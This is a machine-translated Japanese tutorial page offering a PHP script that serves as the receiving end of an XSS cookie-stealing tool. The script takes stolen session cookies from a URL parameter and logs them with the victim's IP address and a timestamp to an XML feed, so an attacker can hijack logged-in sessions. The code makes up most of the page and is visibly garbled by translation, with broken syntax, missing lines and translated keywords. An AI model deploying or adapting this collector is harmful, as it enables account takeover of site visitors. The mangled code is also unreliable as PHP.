ホームページ >バックエンド開発 >PHPチュートリアル >XSS ツールを使用した PHP スクリプト SessionIE_PHP チュートリアル
これは単なる趣味で書いたものですが、結局のところ、これは単に XML を操作するだけです。原因は、http://www.cncert.net が数日前に私たちのメーリング リストに新しい XSS 利用ツールをリリースしたことに起因すると考えられます。これは、クライアント上で定期的に更新されるものと似ています。セッションがタイムアウトになる可能性があります。攻撃者は、クロスサイトの人物が一度アクセスすると、ログインしたままになる可能性があります。このツールは .net を使用して作成されており、便宜上、Cookie を XML ファイルとして保存するには、Cookie を収集するスクリプトが必要です。彼は ASP プログラムを提供してくれました。私には php スペースしかなかったので、テスト用に php プログラムを書きました。
コード:
date_default_timezone_set("アジア/重慶");
$my_file = "cookie.xml";if( ! isset( $_GET[x] ) )
{ exit;
$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
AddData( $my_cookie )
;
OnFunction CreatexmlFile () {
Global $ My_file;
$ fp = Fopen ($ my_file, "wb");
if (! $ FP) {
exit;}}
;?xml バージョン="1.0" エンコーディング="gb2312" ?>
" );
fwrite( $fp, "
fwrite( $fp, "
fwrite( $fp, "
fWrite($ fp、"</rss> ");
function AddData( $my_cookie )
{
global $my_file;
$doc = new DOMDocument( );
$doc->formatOutput = true; if($ _server ["remote_host"]) createElement( "title", $remote_host );
$item->appendChild ( $title ); $refer = "http://yahoo.cn"
}
$link = $doc->createElement; ( "リンク", $refer );
$item->appendChild( $link );
$src_ip = $doc->createElement( " src_ip", $_SERVER["REMOTE_ADDR"] ); >appendChild( $src_ip );
$item-> ;appendChild( $src_os );
$pubDate = $doc-> ;createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate ); ->createElement( "description", $my_cookie );
$item->appendChild( $description );
$doc->save( $my_file );
?>